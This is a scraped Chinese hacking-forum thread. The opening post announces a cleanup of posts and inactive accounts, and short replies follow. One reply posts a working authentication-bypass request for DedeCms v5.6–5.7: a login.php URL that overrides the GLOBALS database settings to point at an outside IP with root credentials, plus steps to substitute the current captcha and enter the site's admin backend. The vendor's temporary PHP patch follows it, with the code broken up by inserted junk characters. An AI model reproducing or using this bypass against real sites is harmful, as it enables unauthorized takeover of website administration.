最近看过此主题的会员

返回列表 发帖

论坛内容及无效ID将进行一次清理

由于论坛近段时间疏于管理、再加上各种和谐压力,交流气氛也不如从前。所以有必要进行一次清理。望大家理解!

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

优蛋 /115网盘专用下载工具/ V2.1.11.126 简体绿色版

来过

最近一直在闭门修行。。所以一直没上,今天有时间发一个贴 证明存在

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

早该做了

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

/抠鼻  大叔不许把我的小马甲给清了。。。
讨厌啊,姐才不是圈内人呢~

TOP

织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

4 Q* W! W9 w4 I6 V! ^
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
% `8 u) H# @5 S0 B% h# T/ c9 d5 D
此漏洞的前提是必须得到后台路径才能实现
6 @& _) D0 E5 R% Y9 W
官方临时解决办法:

0 t3 Q7 {* O1 a4 x5 T7 v' E$ l
找到include/common.inc.php文件,把:
; v9 M2 Q8 [: S  N9 R
    foreach($_REQUEST as $_k=>$_v)
+ f  R& {3 u0 B$ K9 r    {5 L/ ?# l" D; O
        var_dump($_k);
8 L) e, `9 J' T        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )( B, h" ?+ H- ]* {0 n
        {
# F8 F4 i4 N- ?. U" Q& i            exit('Request var not allow!');
. z- |; w. h1 M        }% \- o: T2 D9 _: I" V, n( b
    }

# z$ E9 ~8 r  y, C. C) w
换成:
  `5 }6 p& U( v& n3 y
    //检查和注册外部提交的变量
6 M% X: [  v0 K* p! Y    function CheckRequest(&$val) {
% g9 _1 U2 z8 L9 F        if (is_array($val)) {
) J9 ~8 q1 f0 t  P2 k1 t6 S            foreach ($val as $_k=>$_v) {4 `% E+ T+ v  D8 B% F6 F4 o/ d/ {1 c
                CheckRequest($_k);. ^- A5 b# a# ^6 i* j
                CheckRequest($val[$_k]);9 T! @  P1 T5 N2 f7 X  M& H; ]
            }3 f  m, M6 I! u# c# F% {+ |: x
        } else( i/ R- V* ]$ [5 E" j- n
        {
4 k) g+ z: F; q" m( h9 v            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
& G- T( \% f& X8 T! Z( d            {9 ^# L( t1 I- U) K
                exit('Request var not allow!');( W4 e5 F# V8 h, n( ~- x
            }
& l- |# t0 c# ~- ?+ y! C! T0 y        }+ f& H% a9 M, Z+ |
    }( L7 h3 w' O' d! V, q' [
    CheckRequest($_REQUEST);
& P5 z: s% w$ k. O
# r' R  A5 H8 T/ B$ F1 U; C
0 [% x$ s; D4 V

+ ]; w% m0 v- K  R6 ]- F. d; Y4 E, R- K* Z8 g4 e$ r+ _* Y
% E" l8 i$ C" @3 E$ y
8 b9 i, T0 D7 [+ c7 s1 {
# T8 t! b' a/ T/ V

3 m1 U+ w* [) G9 f+ [  N, ?. Y( B9 s% G; n
9 r2 a3 s% Z: G" A% Q

: N9 t+ ^: B0 {1 ^0 ~- N
1 j: o) {6 I& }: [- u+ I. L" D: Z! y

/ g% h" u* P$ s; u  G1 Y! t2 B" I/ y- |( B1 V" u

7 \3 S0 S; d( @. [! a+ ?/ k  F! q6 \6 Q- v

5 F% K# n( M& Z# s- D0 \1 e- L, a. |! a# l+ \3 h6 J
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表